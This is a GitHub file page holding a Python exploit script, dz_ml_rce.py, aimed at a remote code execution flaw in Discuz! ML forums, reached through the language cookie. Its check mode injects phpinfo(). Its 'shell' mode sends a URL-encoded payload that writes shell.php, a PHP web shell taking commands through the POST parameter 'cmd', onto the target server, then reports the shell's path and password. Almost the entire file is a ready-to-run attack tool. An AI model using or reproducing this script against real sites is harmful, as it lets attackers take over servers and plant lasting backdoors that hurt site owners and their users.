-
Notifications
You must be signed in to change notification settings - Fork 2k
/
dz_ml_rce.py
70 lines (59 loc) · 3.17 KB
/
dz_ml_rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/python
# coding=utf-8
import requests
import re
from argparse import ArgumentParser
class Dz_Ml_RCE:
def __init__(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;'
}
def check(self):
'''漏洞检测'''
self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'")
r = requests.get(url=result.url, headers=self.headers)
if re.search(r'<title>phpinfo\(\)</title>', r.text):
print("[*]Target Is Seem To Be Vulnerable!")
else:
print("[!]Target Is Not Seem To Be Vulnerable!")
def getshell(self):
shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27'
self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload)
r = requests.get(url=result.url, headers=self.headers)
if re.search(r'<title>Forum - Powered by Discuz!</title>', r.text):
print("[*]Shell Create Successfully!")
print(f"[+]shell:在 {result.url} 同目录下的shell.php 密码:cmd")
else:
print("[!]Shell Create Failed!")
def run(self):
if result.func == 'check':
self.check()
elif result.func == 'shell':
self.getshell()
else:
print("[!]请选择正确的功能:check(漏洞检测)/shell(直接getshell)!")
def main():
if not result.func:
print("[!]请先使用-f指定可选的功能:check(漏洞检测)/getshell(直接getshell)")
return
else:
Dz_Ml_RCE().run()
if __name__ == '__main__':
show = '''
_____ _ __ __ _ _____ _____ ______
| __ \ | | | \/ | | | __ \ / ____| ____|
| | | |___| | | \ / | | | |__) | | | |__
| | | |_ / | | |\/| | | | _ /| | | __|
| |__| |/ /|_| | | | | |____ | | \ \| |____| |____
|_____//___(_) |_| |_|______| |_| \_\\_____|______|
______
|______|
By PANDA墨森
'''
print(show + '\n'*2)
arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森')
arg.add_argument('url', help='目标url,eag:http://www.xxx.com/discuz/upload/forum.php')
arg.add_argument('-f', '--func', help='可选的功能:check(漏洞检测)/shell(直接getshell)', dest='func', type=str)
result = arg.parse_args()
main()